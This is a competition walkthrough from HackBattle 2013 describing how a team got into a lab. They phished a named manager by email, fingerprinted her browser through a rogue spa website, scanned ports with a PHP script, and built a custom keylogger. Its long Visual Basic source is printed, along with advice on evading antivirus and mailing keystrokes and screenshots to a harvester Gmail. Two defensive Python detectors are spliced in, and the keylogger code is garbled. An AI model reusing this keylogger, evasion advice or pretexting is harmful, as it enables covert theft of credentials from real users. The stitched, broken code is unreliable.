HACKBATTLE 2013 EMAIL SOCIAL ENGINEERING SNAPSHOTS



Targeting the users was the trick against the Lab

by TeamOwnErz

HACKBATTLE 2013 WALKTHROUGH BY THE WINNERS -- TEAM OWN3RZ

HackBattle 2013 WalkThrough

Tutorial by Munir, Ruthie and Ibrahim


The Scenario

The Process

The server looks well protected from the above scenario, but it also shows evidence of workstations which are not behind the same firewall. This, in the team 0wnErz case, was the best target, but how to get to them was the tricky bit.

So the starting point was what we see i.e.
http://197.232.19.194

Looking at the site: static HTML, nothing fancy on it, no PHP code, therefore ruling out all possibility of SQL injection, which is everyone's juicy cake. Going for the forms: drat, those are mail too, so no PHP form to post to.
The worst you get was directory listing and failed Adobe gallery scripts missing from the gallery page; damn, those would have helped us read the logs, as they need that access to work. So what now? Look at what the site has to offer.

Found 2 emails:

Joan.wokabi@gmail.com – Manager (Home Page)
Daniella.wambuas@gmail.com – IT Staff Manager (About Us Page)

So basically for now we have 2 managers, a business one and a techie one, so from here the push was for the business manager; let's see if she can help us.
So our first contact was to complain about the lack of user experience on the appointment page, nothing fancy, just to see how she takes it and gauge our audience. This is how it went.

She replied, and it's apparent that she does care about user experience. One thing noted though: she copied daniella in the response, who we found out is Daniel, and the email was misspelled on the site. So next, a little bit more getting to know about the whereabouts, but noticing there is a "database" where we have been recorded. But where?? Nice!!!!!!

A little bit more talk and she asks for more information about us, and we gladly give our alias, justifying our email too as to why it is not so personalized ;). On doing this, and with the rapport building up, Joan mentions something important ... she input us in the database and she has access to it; also, from her email we can see that there's an application to manage a database.


I don't know about you, but most people I know have:
phpMyAdmin
sqlbuddy

Let's go with number one though, and the most common install directories for the system. Well, long story short, after a slow trial and error we found a /data directory. Cool, I know, right. Progress finally, but now we need to tread carefully.
Now there are 2 things we can do:
try to exploit the phpMyAdmin
try to trap Joan and compromise Joan's machine, since she has access
We decided to try both but weigh our chances. So step one was to view the phpMyAdmin.

Also notice test.php; well, that's phpinfo, an awesome wealth of information about the server:




Server root: /etc/apache2
webroot: /var/www/
User/Group www-data(33)/33
php version: 5.5.3-1ubuntu2.2
allow_url_fopen On
mysql: 5.5.35
internal IP: 192.168.200.2


Back to phpMyAdmin. Well, we are dealing with one revision behind the latest version:

it's 4.1.8.


What are the odds we will kill this thing and go free? Well, seeing the prompt tells you that no user goes in without a pass, so we download the same version of phpMyAdmin and install it on our end. Now only one problem: we create a valid login to a default db, i.e. mysql, however we can't replay the 4 cookies, which, as we realized later, is because the online one lacked mcrypt while we had it, therefore our cookie pattern was quite different.

“God Blesses those who put errors on their homepage and this server wasn’t blessed it was cursed!!! ”

So let's go the Joan way first; if she has access to this we shall know, but we need to be smart about this, so here is the breakdown of the needs.
Find Joan's environment: she must be on one of the workstations; what's she running, what's her address, etc.
Come up with a super trap and hook Joan to it, then get enough info to steal her credentials and log in as her.

So for the first, Team 0wnErz went with making the competition, so acquire a rogue domain first; we got http://spa.oo3.co. We took a few days to just make a nice HTML site for a spa but added a bit of PHP code in two sections: the first took her information as she visited the home page and wrote it to a text file, and in case she missed that we had another similar hook that mailed us the information when she submitted a form.
The information we needed most was :
IP
Full User Agent Information Including OS information to aid in performing our attack.

The Site:

The script on the homepage had this PHP added to it; it wrote to two files, the first got a summary of just what we needed and the second everything, in case there were extras:


So we talked to Joan to check it out ;)

and she did:


So she is on XP and her IP is as on screen, Firefox 27. Damn, a lot of work here if we go for a browser attack, but let's check if the IP is for a router or proxy or the actual machine. So we made a simple port scanner, not noisy:
<?php
echo "####################################\n";
echo "Team 0wnErz HB2013 PortScanner\n";
echo "####################################\n\n";
$host = "197.232.19.195";

$ports = array("21","22","23","25","53","80","110","143","139","389","443","587","1352","1433","3306","3389","5900","8080");
$arrlength = count($ports);

for ($i = 0; $i < $arrlength; $i++) {
    // one TCP connect per port with a 10 second timeout; @ silences the warning on refused ports
    $fp = @fsockopen($host, $ports[$i], $errno, $errstr, 10);
    if ($fp) {
        echo "port " . $ports[$i] . " open on " . $host . "\n";
        fclose($fp);
    } else {
        echo "port " . $ports[$i] . " closed on " . $host . "\n";
    }
    flush();
}
?>

 
Anyway, as you can see, nothing fancy; fsock is like telnet in PHP :D only we can do it from our web server online, or locally. If it gets blacklisted it is easy to move to another server and continue, but we didn't... no noise :D
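What "no noise" looks like from the other side: a sequential connect scan like the one above touches one new port every few seconds from a single source, which is trivial to pick out of firewall logs if anyone is counting distinct destination ports per source over a window. The detector below is an added example, not part of the original post; the iptables-style log lines it runs on are constructed (documentation-range addresses, invented timestamps), and the port list mirrors the scanner's.

```python
"""Flag sources that touch many distinct TCP ports within a time window.

Added example (not the original post's code). The log lines are constructed in
the shape of Linux iptables LOG / syslog output; feed real lines to
detect_port_scans() to use it.
"""
import re
from collections import defaultdict, deque
from datetime import datetime

LOG_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ kernel: .*?"
    r"SRC=(?P<src>\S+) DST=(?P<dst>\S+) .*?PROTO=(?P<proto>\w+) .*?DPT=(?P<dpt>\d+)"
)

def parse_line(line, year=2014):
    """Return (timestamp, src, dst, dport) or None for non-matching lines (syslog has no year)."""
    m = LOG_RE.search(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%b %d %H:%M:%S").replace(year=year)
    return ts, m.group("src"), m.group("dst"), int(m.group("dpt"))

def detect_port_scans(lines, window_seconds=600, min_ports=8):
    """Map each source that hit >= min_ports distinct ports inside any window to its sorted port list."""
    events = sorted(e for e in (parse_line(l) for l in lines) if e)
    recent = defaultdict(deque)          # src -> (timestamp, dport) inside the window
    alerts = {}
    for ts, src, _dst, dpt in events:
        q = recent[src]
        q.append((ts, dpt))
        while (ts - q[0][0]).total_seconds() > window_seconds:
            q.popleft()                  # drop entries that fell out of the window
        ports = {p for _, p in q}
        if len(ports) >= min_ports:
            alerts[src] = sorted(ports)
    return alerts

# --- constructed sample input -------------------------------------------------
SCANNED_PORTS = [21, 22, 23, 25, 53, 80, 110, 143, 139, 389, 443, 587,
                 1352, 1433, 3306, 3389, 5900, 8080]

def iptables_line(ts, src, dst, dpt):
    """Format one constructed iptables/syslog style line (sample data, not a real log)."""
    return (f"{ts} fw kernel: [  42.0] IN=eth0 OUT= MAC=00:00:00:00:00:00 "
            f"SRC={src} DST={dst} LEN=60 TTL=52 PROTO=TCP SPT=51234 DPT={dpt} SYN")

SAMPLE_LOG = [
    # scanner: one port every 10 seconds, the cadence a 10 s connect timeout produces
    iptables_line(f"Nov 22 10:{(i * 10) // 60:02d}:{(i * 10) % 60:02d}",
                  "203.0.113.7", "198.51.100.10", p)
    for i, p in enumerate(SCANNED_PORTS)
] + [
    # ordinary web client: only 80 and 443
    iptables_line("Nov 22 10:00:30", "198.51.100.20", "198.51.100.10", 80),
    iptables_line("Nov 22 10:01:12", "198.51.100.20", "198.51.100.10", 443),
    iptables_line("Nov 22 10:02:40", "198.51.100.20", "198.51.100.10", 443),
    "Nov 22 10:03:00 fw sshd[123]: Accepted publickey for admin",   # unrelated line, ignored
]

if __name__ == "__main__":
    for src, ports in detect_port_scans(SAMPLE_LOG).items():
        print(f"possible scan from {src}: {len(ports)} ports {ports}")
```

The window is the knob that matters: a scanner that spaces probes a minute apart still collects 18 ports in ten minutes, so size the window to the slowest scan you care about, and log dropped SYNs as well as accepted ones or you only ever see the ports that were open.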

Interesting: rdesktop is on this thing, and HTTP, but rdesktop is the important one; let's test it.

Windows Server 2003 WTF :D . 

Ok, someone's playing us, so now part 2 of our attack needs to be smart; we don't have a very direct target.
 
Since we are dealing with an XP (the user agent didn't lie, or rather we chose to believe that), either way we will need a Windows payload. Windows XP and Server 2003 lack the elevated desktop, so binding some nice application to a keylogger should yield good results. If you like commercially done keyloggers you can get things like Redfox and Ardamax etc., limitless, but anyway save yourself the hassle and write some code; signature-based AVs most probably won't have it. Keep it to simple logic, not complex hooks; those get flagged.
Don't get jealous, ours does:
Screenshots and keys every ten minutes to our harvester email, and the keys and the apps the keys have been trapped from. We put our things together the simple way; don't download and run :D.

Note:
You need a harvester email preferably a Gmail one. Easiest to send to.
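The schedule described above (a mail-out every ten minutes to a webmail SMTP endpoint) is the implant's most visible trait on the wire. This added example, not from the original post, flags any process that talks to a mail port with a near-constant interval, which a human-driven mail client never does. The connection events are constructed telemetry in the shape of endpoint network logs (timestamp, process image, destination host, port); the process names, hosts and times are invented.

```python
"""Flag processes that connect to mail ports on a near-constant schedule.

Added example (not the original post's code). Telemetry below is constructed:
(timestamp, process image, destination host, destination port) tuples.
"""
import statistics
from collections import defaultdict
from datetime import datetime

MAIL_PORTS = frozenset({25, 465, 587})

SAMPLE_CONNECTIONS = [
    # constructed implant: mails out every ~10 minutes with a few seconds of jitter
    ("2014-03-01 09:00:03", "updater.exe", "smtp.gmail.com", 587),
    ("2014-03-01 09:10:01", "updater.exe", "smtp.gmail.com", 587),
    ("2014-03-01 09:20:05", "updater.exe", "smtp.gmail.com", 587),
    ("2014-03-01 09:30:00", "updater.exe", "smtp.gmail.com", 587),
    ("2014-03-01 09:40:02", "updater.exe", "smtp.gmail.com", 587),
    ("2014-03-01 09:50:04", "updater.exe", "smtp.gmail.com", 587),
    # constructed real mail client: same port, human-driven timing
    ("2014-03-01 09:01:10", "thunderbird.exe", "mail.example.com", 587),
    ("2014-03-01 09:03:45", "thunderbird.exe", "mail.example.com", 587),
    ("2014-03-01 09:31:02", "thunderbird.exe", "mail.example.com", 587),
    ("2014-03-01 09:32:15", "thunderbird.exe", "mail.example.com", 587),
    # browsing on a non-mail port: ignored entirely
    ("2014-03-01 09:05:00", "firefox.exe", "www.example.com", 443),
]

def parse_ts(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")

def find_periodic_beacons(conns, ports=MAIL_PORTS, min_count=4, max_jitter=0.1):
    """Return one alert per (process, host, port) whose connection gaps are regular.

    Regularity is the coefficient of variation of the gaps (population std dev
    over mean); a timer-driven sender scores near 0, a person scores near or above 1.
    """
    by_key = defaultdict(list)
    for ts, proc, host, port in conns:
        if port in ports:
            by_key[(proc, host, port)].append(parse_ts(ts))
    alerts = []
    for (proc, host, port), times in by_key.items():
        if len(times) < min_count:
            continue                     # too few samples to call it periodic
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean = statistics.mean(gaps)
        if mean <= 0:
            continue
        jitter = statistics.pstdev(gaps) / mean
        if jitter <= max_jitter:
            alerts.append({"process": proc, "dst": f"{host}:{port}",
                           "period_s": round(mean), "jitter": round(jitter, 3),
                           "count": len(times)})
    return alerts

if __name__ == "__main__":
    for a in find_periodic_beacons(SAMPLE_CONNECTIONS):
        print(f"{a['process']} -> {a['dst']} every ~{a['period_s']}s "
              f"(jitter {a['jitter']}, {a['count']} connections)")
```

Periodicity is the detection; the mitigation is simpler: workstations have no business opening 25/465/587 to the internet at all, so an egress rule that allows those ports only from the organisation's mail relay removes this exfiltration channel regardless of which process is doing it.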
Here is a snippet from the logic of our keylogger in VB.

' basic emailer include and simple system output
Imports System.IO
Imports System.Net.Mail
' yes, if you are asking why the Declares below: it's because we want to reduce dependencies and work with what Windows already has.
Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer
Private Declare Function RegisterServiceProcess Lib "Kernel32.dll" (ByVal dwProcessId As Integer, ByVal dwType As Integer) As Integer
Private Declare Function GetForegroundWindow Lib "user32.dll" () As Int32
Private Declare Function GetWindowText Lib "user32.dll" Alias "GetWindowTextA" (ByVal hwnd As Int32, ByVal lpString As String, ByVal cch As Int32) As Int32
' basic housekeeping for caps and shift key presses so that we accurately record letters as caps or not caps in our main keylogger
Public Function CAPSLOCKON() As Boolean
    If My.Computer.Keyboard.CapsLock = True Then
            Return True
        Else
            Return False
        End If
End Function
Dim mimiNiCapsAmaLa As Integer
Dim Shifter As Integer
' Keylogger engine: usually behind your timer ;) ours is a 10 minute space on the highest of our 3 timers and a textbox to pass your data through.
Shifter = GetAsyncKeyState(System.Windows.Forms.Keys.ShiftKey)

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.A)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "A"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "a"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.B)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "B"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "b"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.C)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "C"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "c"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.D)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "D"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "d"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.E)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "E"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "e"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "F"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "f"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.G)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "G"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "g"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.H)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "H"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "h"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.I)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "I"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "i"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.J)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "J"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "j"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.K)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "K"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "k"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.L)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "L"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "l"
        End If


        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.M)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "M"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "m"
        End If


        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.N)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "N"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "n"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.O)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "O"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "o"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.P)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "P"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "p"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Q)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "Q"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "q"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.R)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "R"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "r"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.S)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "S"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "s"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.T)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "T"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "t"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.U)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "U"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "u"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.V)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "V"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "v"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.W)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "W"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "w"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.X)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "X"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "x"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Y)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "Y"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "y"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Z)
        If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "Z"
        End If
        If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S) Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "z"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.D1)
        If Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "1"
        End If

        If Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "!"
        End If


